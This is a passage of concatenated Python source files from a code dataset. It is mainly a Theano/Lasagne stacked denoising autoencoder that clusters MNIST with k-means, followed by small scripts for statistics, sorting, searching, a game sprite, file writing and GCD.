Larochelle: Greedy Layer-Wise\n   Training of Deep Networks, Advances in Neural Information Processing\n   Systems 19, 2007\n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nimport timeit\n\nimport numpy\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.shared_randomstreams import RandomStreams\n\nfrom logistic_sgd_theano import LogisticRegression\nfrom mlp_theano import HiddenLayer\nfrom dA_theano import dA\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics import adjusted_rand_score\n# from kmeans_numpy import kmeans\nfrom load_data import load_data\nfrom sklearn.cluster import spectral\nimport lasagne\nfrom bestMap import bestMap\ntry:\n    import cPickle as pickle\nexcept ImportError:\n    import pickle\n\n\n# start-snippet-1\nclass SdA(object):\n    \"\"\"Stacked denoising auto-encoder class (SdA)\n\n    A stacked denoising autoencoder model is obtained by stacking several\n    dAs. The hidden layer of the dA at layer `i` becomes the input of\n    the dA at layer `i+1`. The first layer dA gets as input the input of\n    the SdA, and the hidden layer of the last dA represents the output.\n    Note that after pretraining, the SdA is dealt with as a normal MLP,\n    the dAs are only used to initialize the weights.\n    \"\"\"\n\n    def __init__(\n        self,\n        numpy_rng,\n        theano_rng=None,\n        n_ins=784,\n        hidden_layers_sizes=[500, 500],\n        n_outs=10,\n        corruption_levels=[0.1, 0.1]\n    ):\n        \"\"\" This class is made to support a variable number of layers.\n\n        :type numpy_rng: numpy.random.RandomState\n        :param numpy_rng: numpy random number generator used to draw initial\n                          weights\n\n        :type theano_rng: theano.tensor.shared_randomstreams.RandomStreams\n        :param theano_rng: Theano random generator; if None is given one is\n                           generated based on a seed drawn from `rng`\n\n        :type n_ins: int\n        :param n_ins: dimension of the input to the sdA\n\n        :type hidden_layers_sizes: list of ints\n        :param hidden_layers_sizes: intermediate layers size, must contain\n                                    at least one value\n\n        :type n_outs: int\n        :param n_outs: dimension of the output of the network\n\n        :type corruption_levels: list of float\n        :param corruption_levels: amount of corruption to use for each\n                                  layer\n        \"\"\"\n\n        self.sigmoid_layers = []\n        self.dA_layers = []\n        self.params = []\n        self.n_layers = len(hidden_layers_sizes)\n\n        assert self.n_layers > 0\n\n        if not theano_rng:\n            theano_rng = RandomStreams(numpy_rng.randint(2 ** 30))\n        # allocate symbolic variables for the data\n        self.x = T.matrix('x')  # the data is presented as rasterized images\n        self.y = T.ivector('y')  # the labels are presented as 1D vector of\n        # self.l = T.matrix('l')\n        # [int] labels\n        # end-snippet-1\n\n        # The SdA is an MLP, for which all weights of intermediate layers\n        # are shared with different denoising autoencoders\n        # We will first construct the SdA as a deep multilayer perceptron,\n        # and when constructing each sigmoidal layer we also construct a\n        # denoising autoencoder that shares weights with that layer\n        # During pretraining we will train these autoencoders (which will\n        # lead to changing the weights of the MLP as well)\n        # During finetuning we will finish training the SdA by doing\n        # stochastic gradient descent on the MLP\n\n        # start-snippet-2\n        for i in range(self.n_layers):\n            # construct the sigmoidal layer\n\n            # the size of the input is either the number of hidden units of\n            # the layer below or the input size if we are on the first layer\n            if i == 0:\n                input_size = n_ins\n            else:\n                
input_size = hidden_layers_sizes[i - 1]\n\n            # the input to this layer is either the activation of the hidden\n            # layer below or the input of the SdA if you are on the first\n            # layer\n            if i == 0:\n                layer_input = self.x\n            else:\n                layer_input = self.sigmoid_layers[-1].output\n\n            # l = self.l\n\n            sigmoid_layer = HiddenLayer(rng=numpy_rng,\n                                        input=layer_input,\n                                        n_in=input_size,\n                                        n_out=hidden_layers_sizes[i],\n                                        activation=T.nnet.relu)\n            # add the layer to our list of layers\n            self.sigmoid_layers.append(sigmoid_layer)\n            # its arguably a philosophical question...\n            # but we are going to only declare that the parameters of the\n            # sigmoid_layers are parameters of the StackedDAA\n            # the visible biases in the dA are parameters of those\n            # dA, but not the SdA\n            self.params.extend(sigmoid_layer.params)\n\n            # Construct a denoising autoencoder that shared weights with this\n            # layer\n            dA_layer = dA(numpy_rng=numpy_rng,\n                          theano_rng=theano_rng,\n                          input=layer_input,\n                          # l = l,\n                          n_visible=input_size,\n                          n_hidden=hidden_layers_sizes[i],\n                          W=sigmoid_layer.W,\n                          bhid=sigmoid_layer.b)\n            self.dA_layers.append(dA_layer)\n\n    # def pretraining_functions(self, train_set_x, batch_size, laplacian):\n    def pretraining_functions(self, train_set_x, batch_size):\n        ''' Generates a list of functions, each of them implementing one\n        step in training the dA corresponding to the layer with same index.\n        The function will require as input the minibatch index, and to train\n        a dA you just need to iterate, calling the corresponding function on\n        all minibatch indexes.\n\n        :type train_set_x: theano.tensor.TensorType\n        :param train_set_x: Shared variable that contains all datapoints used\n                            for training the dA\n\n        :type batch_size: int\n        :param batch_size: size of a [mini]batch\n\n        :type learning_rate: float\n        :param learning_rate: learning rate used during training for any of\n                              the dA layers\n        '''\n        # index to a [mini]batch\n        index = T.lscalar('index')  # index to a minibatch\n        corruption_level = T.scalar('corruption')  # % of corruption to use\n        learning_rate = T.scalar('lr')  # learning rate to use\n        # beginning of a batch, given `index`\n        batch_begin = index * batch_size\n        # ending of a batch given `index`\n        batch_end = batch_begin + batch_size\n\n        pretrain_fns = []\n        i = 0\n        for dA in self.dA_layers:\n            # get the cost and the updates list\n            # first dA: linear_state=[0, 1]; last dA: linear_state=[1, 0];\n            # every other layer: linear_state=[0, 0]\n            if i == 0:\n                cost, updates = dA.get_cost_updates(corruption_level,\n                                                    learning_rate, linear_state=[0, 1])\n            elif i == len(self.dA_layers) - 1:\n                cost, updates = dA.get_cost_updates(corruption_level,\n                                                    learning_rate, linear_state=[1, 0])\n            else:\n                cost, updates = dA.get_cost_updates(corruption_level,\n                                                    learning_rate, linear_state=[0, 0])\n            # compile the theano function\n            fn = theano.function(\n                inputs=[\n                    index,\n                    theano.In(corruption_level, value=0.2),\n                    theano.In(learning_rate, value=0.1)\n                ],\n                outputs=cost,\n                updates=updates,\n                givens={\n                    self.x: train_set_x[batch_begin: batch_end]\n                }\n            )\n            # append `fn` to the list of functions\n            pretrain_fns.append(fn)\n            i += 1\n\n        return pretrain_fns\n\n    def finetuning_functions(self, train_set_x, batch_size, learning_rate_shared, input_var):\n        ''' Generates a list of functions, each of them implementing one\n        step in training the dA corresponding to the layer with same index.\n        The function will require as input the minibatch index, and to train\n        a dA you just need to iterate, calling the corresponding function on\n        all minibatch indexes.\n\n        :type train_set_x: theano.tensor.TensorType\n        :param train_set_x: Shared variable that contains all datapoints 
used\n                            for training the dA\n\n        :type batch_size: int\n        :param batch_size: size of a [mini]batch\n\n        :type learning_rate: float\n        :param learning_rate: learning rate used during training for any of\n                              the dA layers\n        '''\n\n        # index to a [mini]batch\n        index = T.lscalar('index')  # index to a minibatch\n        corruption_level = T.scalar('corruption')  # % of corruption to use\n        # learning_rate = T.scalar('lr') # learning rate to use\n        # beginning of a batch, given `index`\n        batch_begin = index * batch_size\n        # ending of a batch given `index`\n        batch_end = batch_begin + batch_size\n\n        hid1 = self.dA_layers[0].get_hidden_values(input_var)\n        hid2 = self.dA_layers[1].get_hidden_values(hid1)\n        hid3 = self.dA_layers[2].get_hidden_values(hid2)\n        hid4 = self.dA_layers[3].get_hidden_values_linear(hid3)\n        recons4 = self.dA_layers[3].get_reconstructed_input(hid4)\n        recons3 = self.dA_layers[2].get_reconstructed_input(recons4)\n        recons2 = self.dA_layers[1].get_reconstructed_input(recons3)\n        recons1 = self.dA_layers[0].get_reconstructed_input_linear(recons2)\n\n        loss = lasagne.objectives.squared_error(input_var, recons1)\n        loss = loss.mean()\n\n        params = self.params\n        updates = lasagne.updates.sgd(\n            loss, params, learning_rate=learning_rate_shared)\n\n        finetune = theano.function(\n            inputs=[\n                # index,\n                input_var\n            ],\n            outputs=loss,\n            updates=updates,\n            # givens={\n            #     # self.x: train_set_x[batch_begin: batch_end],\n            #     # self.l: laplacian[:,batch_begin: batch_end]\n            # }\n        )\n\n        return finetune\n\n    def load(self, fname):\n        with open(fname, 'rb') as fin:\n            args_save = pickle.load(fin)\n        return args_save\n        # for key, v in args_save.items():\n        #     if key in self.args:\n        #         self.args[key][:] = v\n\n\ndef Laplacian(x, sigma=0.5):\n    D = T.sqrt(\n        T.maximum((x ** 2).sum(1).reshape((x.shape[0], 1)) + (x ** 2).sum(1).reshape((1, x.shape[0])) - 2 * x.dot(x.T),\n                  sys.float_info.epsilon))\n    Dt = T.exp(-D / (2 * sigma ** 2)) - T.identity_like(D)\n    degree = Dt.sum(axis=1)\n    L = theano.tensor.nlinalg.diag(degree) - Dt\n    L = L.eval()\n    return L\n\ndef build_dA_fromsaved(input_var=None, n_in=None, layer_struct=None, corruption_level=None, nonlinearity=[[None, None],[None, None],[None, None],[None, None]], dA_layers=None):\n    l_in = lasagne.layers.InputLayer(shape=(None, n_in),\n                                     input_var=input_var)\n    l_in_drop = lasagne.layers.DropoutLayer(l_in, p=0.0)\n\n    l_hid1 = lasagne.layers.DenseLayer(\n        l_in_drop, num_units=layer_struct[0],\n        nonlinearity=nonlinearity[0][0],\n        W=args_load.get('encoder_0_weight').T,\n        b=args_load.get('encoder_0_bias'))\n\n    l_hid1_drop = lasagne.layers.DropoutLayer(l_hid1, p=0.0)\n\n    l_hid2 = lasagne.layers.DenseLayer(\n        l_hid1_drop, num_units=layer_struct[1],\n        nonlinearity=nonlinearity[1][0],\n        W=args_load.get('encoder_1_weight').T,\n        b=args_load.get('encoder_1_bias'))\n\n    l_hid2_drop = lasagne.layers.DropoutLayer(l_hid2, p=0.0)\n\n    l_hid3 = lasagne.layers.DenseLayer(\n        l_hid2_drop, num_units=layer_struct[2],\n        nonlinearity=nonlinearity[2][0],\n        W=args_load.get('encoder_2_weight').T,\n        b=args_load.get('encoder_2_bias'))\n\n    l_hid3_drop = lasagne.layers.DropoutLayer(l_hid3, p=0.0)\n\n    l_hid4 = lasagne.layers.DenseLayer(\n        l_hid3_drop, num_units=layer_struct[3],\n        nonlinearity=nonlinearity[3][0],\n        W=args_load.get('encoder_3_weight').T,\n        b=args_load.get('encoder_3_bias'))\n\n    l_hid4_drop = lasagne.layers.DropoutLayer(l_hid4, p=0.0)\n\n    l_recons4 = lasagne.layers.DenseLayer(\n        l_hid4_drop, num_units=layer_struct[2],\n        nonlinearity=nonlinearity[3][1],\n        W=args_load.get('decoder_3_weight').T,\n        
b=args_load.get('decoder_3_bias'))\n\n l_recons3 = lasagne.layers.DenseLayer(\n l_recons4, num_units=layer_struct[1],\n nonlinearity=nonlinearity[2][1],\n W=args_load.get('decoder_2_weight').T,\n b=args_load.get('decoder_2_bias'))\n\n l_recons2 = lasagne.layers.DenseLayer(\n l_recons3, num_units=layer_struct[0],\n nonlinearity=nonlinearity[1][1],\n W=args_load.get('decoder_1_weight').T,\n b=args_load.get('decoder_1_bias'))\n\n l_recons1 = lasagne.layers.DenseLayer(\n l_recons2, num_units=n_in,\n nonlinearity=nonlinearity[0][1],\n W=args_load.get('decoder_0_weight').T,\n b=args_load.get('decoder_0_bias'))\n\n return l_hid4_drop, l_recons1\n\n\ndef build_dA(input_var=None, n_in=None, layer_struct=None, corruption_level=None, nonlinearity=[[None, None],[None, None],[None, None],[None, None]], dA_layers=None):\n l_in = lasagne.layers.InputLayer(shape=(None, n_in),\n input_var=input_var)\n l_in_drop = lasagne.layers.DropoutLayer(l_in, p=0.0)\n\n l_hid1 = lasagne.layers.DenseLayer(\n l_in_drop, num_units=layer_struct[0],\n nonlinearity=nonlinearity[0][0],\n W=dA_layers[0].W,\n b=dA_layers[0].b)\n\n l_hid1_drop = lasagne.layers.DropoutLayer(l_hid1, p=0.0)\n\n l_hid2 = lasagne.layers.DenseLayer(\n l_hid1_drop, num_units=layer_struct[1],\n nonlinearity=nonlinearity[1][0],\n W=dA_layers[1].W,\n b=dA_layers[1].b)\n\n l_hid2_drop = lasagne.layers.DropoutLayer(l_hid2, p=0.0)\n\n l_hid3 = lasagne.layers.DenseLayer(\n l_hid2_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[2][0],\n W=dA_layers[2].W,\n b=dA_layers[2].b)\n\n l_hid3_drop = lasagne.layers.DropoutLayer(l_hid3, p=0.0)\n\n l_hid4 = lasagne.layers.DenseLayer(\n l_hid3_drop, num_units=layer_struct[3],\n nonlinearity=nonlinearity[3][0],\n W=dA_layers[3].W,\n b=dA_layers[3].b)\n\n l_hid4_drop = lasagne.layers.DropoutLayer(l_hid4, p=0.0)\n\n l_recons4 = lasagne.layers.DenseLayer(\n l_hid4_drop, num_units=layer_struct[2],\n nonlinearity=nonlinearity[3][1],\n W=dA_layers[3].W_prime,\n b=dA_layers[3].b_prime)\n\n l_recons3 = lasagne.layers.DenseLayer(\n l_recons4, num_units=layer_struct[1],\n nonlinearity=nonlinearity[2][1],\n W=dA_layers[2].W_prime,\n b=dA_layers[2].b_prime)\n\n l_recons2 = lasagne.layers.DenseLayer(\n l_recons3, num_units=layer_struct[0],\n nonlinearity=nonlinearity[1][1],\n W=dA_layers[1].W_prime,\n b=dA_layers[1].b_prime)\n\n l_recons1 = lasagne.layers.DenseLayer(\n l_recons2, num_units=n_in,\n nonlinearity=nonlinearity[0][1],\n W=dA_layers[0].W_prime,\n b=dA_layers[0].b_prime)\n\n return l_hid4_drop, l_recons1\n\ndef iterate_minibatches(inputs, targets, batchsize, shuffle=False):\n assert len(inputs) == len(targets)\n if shuffle:\n indices = numpy.arange(len(inputs))\n numpy.random.shuffle(indices)\n for start_idx in range(0, len(inputs) - batchsize + 1, batchsize):\n if shuffle:\n excerpt = indices[start_idx:start_idx + batchsize]\n else:\n excerpt = slice(start_idx, start_idx + batchsize)\n yield inputs[excerpt], targets[excerpt], excerpt\n\nfinetune_lr = 0.1\nlearning_rate_shared = theano.shared(lasagne.utils.floatX(finetune_lr))\npretraining_epochs = 180\nfinetuning_epochs = 360\npretrain_lr = 0.1\n# training_epochs=1000\ndataset = 'mnist.pkl.gz'\nbatch_size = 256\n\"\"\"\nDemonstrates how to train and test a stochastic denoising autoencoder.\n\nThis is demonstrated on MNIST.\n\n:type learning_rate: float\n:param learning_rate: learning rate used in the finetune stage\n(factor for the stochastic gradient)\n\n:type pretraining_epochs: int\n:param pretraining_epochs: number of epoch to do pretraining\n\n:type 
pretrain_lr: float\n:param pretrain_lr: learning rate to be used during pre-training\n\n:type n_iter: int\n:param n_iter: maximal number of iterations to run the optimizer\n\n:type dataset: string\n:param dataset: path to the pickled dataset\n\n\"\"\"\n\ndatasets = load_data(dataset, data_size=70000)\n\ntrain_set_x, train_set_y = datasets\nnClusters = len(numpy.unique(train_set_y))\n\n# compute number of minibatches for training, validation and testing\nn_train_batches = train_set_x.get_value(borrow=True).shape[0]\nn_train_batches //= batch_size\n\n# numpy random generator\n# start-snippet-3\nnumpy_rng = numpy.random.RandomState(89677)\nprint('... building the model, squared error, 2 linear activations fixed')\n# construct the stacked denoising autoencoder class\nsda = SdA(\n    numpy_rng=numpy_rng,\n    n_ins=28 * 28,\n    hidden_layers_sizes=[500, 500, 2000, 10],\n    n_outs=10\n)\ninput_var = T.matrix('inputs')\nX = numpy.asarray(train_set_x.eval())\ny = numpy.asarray(train_set_y.eval())\nnonlinearities = [[lasagne.nonlinearities.rectify, lasagne.nonlinearities.linear],\n                  [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n                  [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n                  [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify]]\nhidden_layers_sizes = [500, 500, 2000, 10]\n# Deep fine-tuning\nargs_load = sda.load('mnist_pt_full3.arg')\nlearning_rate = 0.1\ninit_learning_rate = learning_rate\nn_epochs = 360\ncorruption_levels = [.2, .2, .2, .2]\nlearning_rate_shared = theano.shared(lasagne.utils.floatX(learning_rate))\nencoder, network = build_dA_fromsaved(input_var, n_in=X.shape[1], layer_struct=hidden_layers_sizes, corruption_level=corruption_levels, dA_layers=args_load, nonlinearity=nonlinearities)\n# end-snippet-3 start-snippet-4\n#########################\n# PRETRAINING THE MODEL #\n#########################\n# Calculate Laplacian for each minibatch\n# laplacian = T.matrix('laplacian')\n# tl = theano.typed_list.TypedListType(theano.sandbox.cuda.type.CudaNdarrayType)()\n# v = theano.sandbox.cuda.type.CudaNdarrayType()\n# o = theano.typed_list.append(tl, v)\n# f = theano.function([tl, v], o)\n\n# for batch_index in range(n_train_batches):\n# index to a [mini]batch\n# beginning of a batch, given `index`\n# batch_begin = batch_index * batch_size\n# ending of a batch given `index`\n# batch_end = batch_begin + batch_size\n# if batch_index == 0:\n#     L = Laplacian(train_set_x[batch_begin:batch_end])\n# else:\n#     L = numpy.concatenate((L, Laplacian(train_set_x[batch_begin:batch_end])), axis=1)\n\n# laplacian = theano.shared(numpy.asarray(L,dtype=theano.config.floatX),borrow=True)\n\n# laplacian = theano.shared(laplacian, borrow=True)\n# print('... getting the pretraining functions')\n# pretraining_fns = sda.pretraining_functions(train_set_x=train_set_x,\n#                                             batch_size=batch_size)\n# # laplacian=laplacian)\n#\n#\n# print('... 
pre-training the model')\n# start_time = timeit.default_timer()\n# ## Pre-train layer-wise\n# corruption_levels = [.2, .2, .2, .2]\n# for i in range(sda.n_layers):\n# # go through pretraining epochs\n# for epoch in range(pretraining_epochs):\n# # go through the training set\n# c = []\n# for batch_index in range(n_train_batches):\n# c.append(pretraining_fns[i](index=batch_index,\n# corruption=corruption_levels[i],\n# lr=pretrain_lr))\n# if i == 0:\n# if epoch <> 0:\n# if float(epoch) % 72 == 0:\n# pretrain_lr /= 10\n# print('New learning rate: ', pretrain_lr)\n# print('Pre-training layer %i, epoch %d, cost %f' % (i, epoch, numpy.mean(c)))\n#\n# end_time = timeit.default_timer()\n# try:\n# approot = os.path.split(__file__)[1]\n# except NameError: # We are the main py2exe script, not a module\n# approot = os.path.split(sys.argv[0])[1]\n# print(('The pretraining code for file ' +\n# approot +\n# ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n# # run Kmeans\n# hidden = []\n# for i in range(sda.dA_layers.__len__()):\n# if i == 0:\n# hidden.append(sda.dA_layers[i].get_hidden_values(train_set_x))\n# concat = hidden[i].eval()\n# else:\n# hidden.append(sda.dA_layers[i].get_hidden_values(hidden[i - 1]))\n# concat = numpy.concatenate((concat, hidden[i].eval()), axis=1)\n#\n# out = hidden[i].eval()\n# print('Sda[', i, ']+builtin K-means:')\n# kmeans = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\n# y_pred = kmeans.fit_predict(out)\n#\n# print('nmi = ', normalized_mutual_info_score(train_set_y.eval(), y_pred), '\\t acc = ',\n# bestMap(train_set_y.eval(), y_pred), 'inertia=',\n# kmeans.inertia_)\n# # kmeans(out, train_set_y.eval())\n#\n# input_var = T.matrix('inputs')\n# X = numpy.asarray(train_set_x.eval())\n# y = numpy.asarray(train_set_y.eval())\n# nonlinearities = [[lasagne.nonlinearities.rectify, lasagne.nonlinearities.linear],\n# [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n# [lasagne.nonlinearities.rectify, lasagne.nonlinearities.rectify],\n# [lasagne.nonlinearities.linear, lasagne.nonlinearities.rectify]]\n# hidden_layers_sizes = [500, 500, 2000, 10]\n# # Deep fine-tuning\n# learning_rate = 0.1\n# init_learning_rate = learning_rate\n# n_epochs = 360\n# learning_rate_shared = theano.shared(lasagne.utils.floatX(learning_rate))\n# encoder, network = build_dA(input_var, n_in=X.shape[1], layer_struct=hidden_layers_sizes, corruption_level=corruption_levels, dA_layers=sda.dA_layers, nonlinearity=nonlinearities)\nreconstruction = lasagne.layers.get_output(network)\nenc_out = lasagne.layers.get_output(encoder)\n\nloss = lasagne.objectives.squared_error(reconstruction, input_var)\n#loss = loss.sum()\nloss = loss.mean()\n\nparams = lasagne.layers.get_all_params(network, trainable=True)\nupdates = lasagne.updates.sgd(\n loss, params, learning_rate=learning_rate_shared)\n\n\n# train_fn = theano.function([input_var], loss, updates=updates)\n#\n#\n# # Finally, launch the training loop.\n# print(\"Starting training...\")\n# # We iterate over epochs:\n# best_val_acc = 0\n# best_result = 0\n# best_batches = 0\n# for epoch in range(n_epochs):\n# # In each epoch, we do a full pass over the training data:\n# train_err = 0\n# train_batches = 0\n# start_time = time.time()\n# hidden_output_concat = []\n# # Training\n# for batch in iterate_minibatches(X, y, batch_size, shuffle=True):\n# inputs, targets, idx = batch\n# minibatch_err = train_fn(inputs)\n# train_err += minibatch_err\n# train_batches += 1\n#\n# print(\"Epoch {} of {}\".format(\n# epoch 
+ 1, n_epochs), \"\\t training loss:\\t\\t{:.6f}\".format(train_err / train_batches), 'time: {:.2f}s'.format(time.time()-start_time))\n#\n# # # Annealing\n# # if epoch > annealing_threshold:\n# # # learning_rate = learning_rate_shared.get_value()\n# # learning_rate = max(0, ((float(n_epochs - epoch)) / float((\n# # n_epochs - annealing_threshold)))) * init_learning_rate # learning_rate - (init_learning_rate/(n_epochs - annealing_threshold))\n# # learning_rate_shared.set_value(lasagne.utils.floatX(learning_rate))\n# if epoch<>0:\n# if float(epoch) % 72 == 0:\n# learning_rate /= 10\n# print('New learning rate: ', learning_rate)\n# learning_rate_shared.set_value(lasagne.utils.floatX(learning_rate))\n#\n\n# ## K-means\nprediction_clean = lasagne.layers.get_output(encoder, deterministic=True)\nf = theano.function([input_var], prediction_clean)\nhidden_out = f(X)\nprediction_noisy = lasagne.layers.get_output(encoder, deterministic=False)\n\n# Get kmeans centroids for weight initialization\n# Baseline Kmeans\nstart_time = timeit.default_timer()\nkmeans_model = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\ny_pred = kmeans_model.fit_predict(hidden_out)\ncentroids = kmeans_model.cluster_centers_.T\ncentroids = centroids / numpy.sqrt(numpy.diag(numpy.matmul(centroids.T, centroids)))\ncentroids_shared = theano.shared(numpy.asarray(centroids, dtype=theano.config.floatX), borrow=True)\n\nend_time = timeit.default_timer()\nprint('k-means: \\t nmi = {:.4f} '.format(normalized_mutual_info_score(y, y_pred)),\n '\\t acc = {:.4f} '.format(bestMap(y, y_pred)),\n '\\t runtime', end_time - start_time, 'inertia=', kmeans_model.inertia_)\n\n\n# centroids_shared = theano.shared(numpy.asarray(centroids,\n# dtype=theano.config.floatX),\n# borrow=True)\n#\n# # network2 = build_eml(hidden_output)\n#\n#\n# # # Then we print the results for this epoch:\n# # print('epoch:', epoch, 'nmi = ', normalized_mutual_info_score(y, prediction_y),\n# # '\\t arc = ', adjusted_rand_score(y, prediction_y))\n#\n# # print('Sda[Concatenation]+builtin K-means:')\n# # kmeans(concat, train_set_y.eval())\n#\n# finetune_fn = sda.finetuning_functions(train_set_x=train_set_x,\n# batch_size=batch_size, learning_rate_shared=learning_rate_shared, input_var=input_var)\n#\n# print('... 
finetuning the model')\n# start_time = timeit.default_timer()\n# ## Finetuning loop\n# for epoch in range(finetuning_epochs):\n#     # go through the training set\n#     c = []\n#     # for batch_index in range(n_train_batches):\n#     #     c.append(finetune_fn(index=batch_index))\n#     for batch in iterate_minibatches(X, y, batch_size, shuffle=True):\n#         inputs, targets, idx = batch\n#         c.append(finetune_fn(inputs))\n#\n#     print('Finetuning , epoch %d, cost %f' % (epoch, numpy.mean(c)))\n#     if epoch <> 0:\n#         if float(epoch) % 72 == 0:\n#             finetune_lr /= 10\n#             print('New learning rate: ', finetune_lr)\n#             learning_rate_shared.set_value(lasagne.utils.floatX(finetune_lr))\n#\n# hid1 = sda.dA_layers[0].get_hidden_values(input_var)\n# hid2 = sda.dA_layers[1].get_hidden_values(hid1)\n# hid3 = sda.dA_layers[2].get_hidden_values(hid2)\n# hid4 = sda.dA_layers[3].get_hidden_values_linear(hid3)\n# enc_out = theano.function([input_var], hid4)\n# enc_out_val = enc_out(train_set_x.eval())\n#\n# print('deep_SdA_builtin K-means:')\n# kmeans = KMeans(init='k-means++', n_clusters=nClusters, n_init=20, max_iter=300)\n# y_pred = kmeans.fit_predict(enc_out_val)\n#\n# print('nmi = ', normalized_mutual_info_score(train_set_y.eval(), y_pred), '\\t acc = ',\n#       bestMap(train_set_y.eval(), y_pred), 'inertia=',\n#       kmeans.inertia_)\n","sub_path":"code_3/SdA_deep_dA_theano_2.py","file_name":"SdA_deep_dA_theano_2.py","file_ext":"py","file_size_in_byte":28944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512310012","text":"import math\n\ndef my_std(sample):\n    smean = (sum(sample)/len(sample))\n    stdsum = 0\n\n    for n in sample:\n        stdsum = stdsum + (n-smean)**2\n\n    return math.sqrt(stdsum/(len(sample)-1))\n\ns = [71, 73, 73, 74, 74, 75, 76, 77, 77, 79, 81, 83]\nprint(my_std(s))","sub_path":"playing-with-stats/std.py","file_name":"std.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19692642","text":"import random\nfrom materials.parameters import *\nfrom materials.images import *\n\n\nclass Bird:\n    def __init__(self, away_y):\n        self.x = random.randrange(550, 730)\n        self.y = away_y\n        self.width = 55\n        self.height = 105\n        self.ay = away_y\n        self.speed = 3\n        self.dest_y = self.speed * random.randrange(20, 70)\n        self.img_cnt = 0\n        self.cd_hide = 0\n        self.come = True\n        self.go_away = False\n\n    def draw(self):\n        if self.img_cnt == 30:\n            self.img_cnt = 0\n\n        display.blit(bird_img[self.img_cnt // 6], (self.x, self.y))\n        self.img_cnt += 1\n\n        if self.come and self.cd_hide == 0:\n            return 1\n        elif self.go_away:\n            return 2\n        elif self.cd_hide > 0:\n            self.cd_hide -= 1\n\n        return 0\n\n    def show(self):\n        if self.y < self.dest_y:\n            self.y += self.speed\n        else:\n            self.come = False\n            # self.go_away = True\n            self.dest_y = self.ay\n\n    def hide(self):\n        if self.y > self.dest_y:\n            self.y -= self.speed\n        else:\n            self.come = True\n            self.go_away = False\n            self.x = random.randrange(550, 730)\n            self.dest_y = self.speed * random.randrange(20, 70)\n\n    def check_dmg(self, bullet):\n        if self.x <= bullet.x <= self.x + self.width:\n            # the vertical bound must use the bird's own extent\n            if self.y <= bullet.y <= self.y + self.height:\n                self.go_away = True\n","sub_path":"models/bird.py","file_name":"bird.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164898096","text":"def matSearch(mat,x):\r\n    for r in range(0,len(mat)):\r\n        row=mat[r]\r\n        l=0\r\n        h=len(row)-1\r\n        while 
l<=h:\r\n            mid=(l+h)//2\r\n            if row[mid]==x:\r\n                return [r,mid]\r\n            elif x<row[mid]:\r\n                h=mid-1\r\n            elif x>row[mid]:\r\n                l=mid+1\r\n    return [-1,-1]\r\n\r\nmat=[[ 1 , 3 , 4 , 5 ],\r\n     [ 2 , 6 , 8 , 9 ],\r\n     [ 11 , 10 , 13 , 14 ]]\r\nx=9\r\nprint(matSearch(mat,x))\r\n","sub_path":"Byte_by_Byte/9.Matrix_Search.py","file_name":"9.Matrix_Search.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123132357","text":"from time import time\r\nfrom sort.random_arr import get_arr\r\n\r\narr = get_arr(10000)\r\n\r\n\r\ndef InsertionSort(arr):\r\n    for i in range(1, len(arr)):\r\n        for j in range(i, 0, -1):\r\n            if arr[j] < arr[j - 1]:\r\n                arr[j], arr[j - 1] = arr[j - 1], arr[j]\r\n\r\nif __name__ == '__main__':\r\n    t1 = time()\r\n    # InsertionSort sorts in place and returns None, so call it without rebinding arr\r\n    InsertionSort(arr)\r\n    t2 = time()\r\n    print(arr)\r\n    print(t2 - t1)\r\n","sub_path":"sort/InsertionSort.py","file_name":"InsertionSort.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"622356609","text":"\"\"\"\nfile_write.py\nA short demo of writing to a file\n\"\"\"\n\n# f = open('file','wb')\nf = open('file','a')\n\n# write operations\n# f.write(\"hi, you rascal\\n\".encode())\n# f.write(\"oh my, what is it\\n\".encode())\n\nf.writelines(['hahaha\\n','hehehe\\n','heyheyhey'])\n\nf.close()","sub_path":"note/download_note/second_month/IO/day02/file_write.py","file_name":"file_write.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"227223253","text":"\"\"\"\nGiven two numbers, a and b, find the GCD (Greatest Common Divisor)\n\"\"\"\n\ndef gcd(a,b):\n    while(b != 0):\n        temporary = a\n        a = b\n        b = temporary % b\n    return a\n\n\n# Try out the function with a few examples\nprint(gcd(60, 96)) # Should be 12\nprint(gcd(20,8)) # Should be 4 ","sub_path":"learn_data_structures/python/algorithm/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288522116","text":"import json\nimport math\nimport statistics\nimport numpy as np\nimport sys\n\n# Set the number of features available\nnumFeatures = 0\n\n# Set the data set directory path\ndataSetPath = '.'\ntrainSetName = '/data/train.csv.home.data'\ntestSetName = '/data/test.csv.home.data'\nvalidateSetPattern = '/data/train%d.csv.home.data'\n\n# The following are global dictionaries used to store the data from various sets (test, train, dev, cross-validate)\ntrainLabelsDictionary = {}\ntrainFeaturesDictionary = {}\nvalidateLabelsDictionary = {}\nvalidateFeaturesDictionary = {}\ntestLabelsDictionary = {}\ntestFeaturesDictionary = {}\n\ndef main(path):\n    global trainLabelsDictionary\n    global testLabelsDictionary\n    global trainFeaturesDictionary\n    global testFeaturesDictionary\n    global numFeatures\n    global dataSetPath\n\n  